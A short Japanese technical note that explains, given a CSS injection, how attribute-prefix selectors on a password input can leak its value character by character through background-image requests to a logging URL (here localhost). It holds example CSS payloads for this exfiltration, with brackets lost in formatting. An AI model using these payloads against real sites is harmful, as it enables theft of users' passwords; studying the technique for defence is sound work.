CSSセレクタでHTML属性を読み取る - cist-it

CSSセレクタでHTML属性を読み取る

前提

CSSインジェクションで適当なCSSファイルを読み込ませている

CSSセレクタを使って、Webページ内のHTML属性の値を読み取れる場合があります。

今回読み取る要素

code:target.html

<input type="password">

読み取り方いろいろ

code:1.css

inputtype="password"value^="a" {

background-image: url(https://localhost/reader?char=a);

}

inputtype="password"value^="b" {

background-image: url(https://localhost/reader?char=b);

}

// ...

パスワードに含まれている文字は何であるか、localhostへのアクセスログを読めば分かる

試したい